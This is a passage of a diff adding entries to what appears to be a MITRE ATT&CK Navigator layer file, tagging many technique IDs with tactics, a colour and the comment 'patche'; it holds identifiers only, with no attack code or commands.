+            "techniqueID": "T1027.010",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1559.001",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.015",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1554",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1195.001",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.009",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.009",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.009",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1213.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1578.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.002",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1578.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1110.004",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1552.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1555",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1555.003",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1552.002",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.001",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1071.004",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1568.003",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1485",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1132",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1486",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1565",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1074",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1530",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1005",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1213.006",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1102.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1622",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1622",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.001",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1678",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1578.003",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1140",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1610",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1006",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1600.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685.004",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1686",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1561.001",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1561.002",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1087.002",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.002",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.002",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1568.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1069.002",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1482",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1484",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1484",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1583.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1584.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.007",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1689",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1601.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.004",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.007",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.006",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.006",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1568",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.015",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1548.004",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1586.002",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1585.002",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1589.002",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1684.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.013",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1480.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1585",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.005",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1480",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1048.002",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1041",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1048.003",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1567",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1567.004",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1567.002",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1567.001",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1190",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1687",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1211",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1587.004",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.014",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1090.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1133",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1133",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.011",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.011",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1008",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1071.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1083",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1222",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.012",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.011",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1657",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1495",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1056.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1056.002",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1589",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1591",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1683",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1484.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1484.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1552.006",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.006",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1665",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.007",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.007",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.007",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1219.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.011",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1546.012",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1546.012",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1684.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1202",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1105",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1490",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553.004",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1546.016",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1546.016",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1559",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1491.001",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1090.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1534",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.018",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127.003",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.007",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.016",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1001.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.013",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.013",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1555.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1056.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1056.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.012",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1003.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1570",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1608.005",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1222.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.015",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.015",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1087.001",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1136.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.003",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.003",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.003",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1074.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1114.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1069.001",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1680",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.014",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127.001",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.003",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1204.004",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1204.002",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1204.001",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1587.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1588.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553.005",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.010",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.005",
